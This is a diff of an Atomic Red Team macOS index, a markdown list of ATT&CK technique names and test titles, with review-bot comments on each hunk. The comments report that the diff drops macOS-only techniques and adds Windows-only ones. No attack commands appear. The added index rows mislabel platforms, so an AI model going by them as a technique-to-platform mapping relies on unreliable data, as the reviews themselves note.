+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.006 Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.004 Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1647 Plist File Modification](../../T1647/T1647.md)
- - Atomic Test #1: Plist Modification [macos]
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.005 Signed Binary Proxy Execution: Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.012 LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
- Atomic Test #2: Create Hidden User using IsHidden option [macos]
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #3: Mac HISTCONTROL [macos, linux]
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.001 Signed Binary Proxy Execution: Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.005 Indicator Removal on Host: Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #6: Disable Carbon Black Response [macos]
- Atomic Test #7: Disable LittleSnitch [macos]
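Review bot: `-- [T1574.006 Hijack Execution Flow: LD_PRELOAD]` and its `Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]` row are removed here even though that test is tagged [macos] alone, so it now appears in no per-platform index at all; the same applies to the three T1548.001 Setuid and Setgid tests and to T1647 Plist File Modification, which exists only for macOS. In their place the hunk adds rows that name Windows components explicitly (`Clear Windows Event Logs`, `Password Filter DLL`, `Modify Registry`, `Network Share Connection Removal`, `Rogue Domain Controller`). Either the generator's platform lookup is reading the wrong field or the ATT&CK data it was given is mislabelled; the diff should not be merged until one of those is confirmed.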
@@ -126,18 +137,22 @@
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.014 Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.010 Signed Binary Proxy Execution: Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.003 Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #4: Install root CA on macOS [macos]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
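Review bot: The two rows removed in this hunk, `-- T1564.009 Resource Forking` and `-- T1548.004 Elevated Execution with Prompt`, are macOS-only techniques, while the rows taking their place (`Process Hollowing`, `Regsvr32`, `Regsvcs/Regasm`, `SID-History Injection`) are Windows-only. A cheap sanity check for the regenerated file is that no row in macos-index.md contains 'Windows', 'DLL', 'Registry' or 'NTFS' in its name; this hunk alone fails that check, so wire it into CI alongside the regeneration.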
@@ -145,23 +160,36 @@
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1656 Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.002 ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
+- T1221 Template Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #3: Binary simply packed by UPX [macos]
- Atomic Test #4: Binary packed by UPX, with modified headers [macos]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- - Atomic Test #1: Space After Filename (Manual) [macos]
- - Atomic Test #2: Space After Filename [macos, linux]
-- T1548.006 TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216.002 SyncAppvPublishingServer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.007 Obfuscated Files or Information: Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1220 XSL Script Processing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
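Review bot: dropping T1036.006 Masquerading: Space after Filename, which carries two existing tests (`- - Atomic Test #1: Space After Filename (Manual) [macos]` and `- - Atomic Test #2: Space After Filename [macos, linux]`), and T1548.006 TCC Manipulation, a macOS-only technique, looks like a regression in the index generator rather than an intended change, and the CONTRIBUTE A TEST entries added in the same hunk (T1550.002 Pass the Hash, T1574.002 DLL Side-Loading, T1216.002 SyncAppvPublishingServer, T1055.015 ListPlanting, T1220 XSL Script Processing) are Windows-only techniques that do not belong in an index whose listed tests are all tagged [macos] or [linux]. Please check the platform filter that selects techniques for this index and regenerate so the removed macOS entries survive. As a style point, the entries are emitted in no stable order, so every regeneration produces a large unreviewable diff; sorting by technique ID in the generator would keep these hunks small.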
@@ -169,98 +197,227 @@
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.004 Hide Artifacts: NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# privilege-escalation
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
+ - Atomic Test #3: Enable Guest Account on macOS [macos]
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
+ - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+ - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+ - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+ - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# execution
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1047 Windows Management Instrumentation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.002 Inter-Process Communication: Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.001 Command and Scripting Interpreter: PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.011 Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.003 Command and Scripting Interpreter: Windows Command Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1569.002 System Services: Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
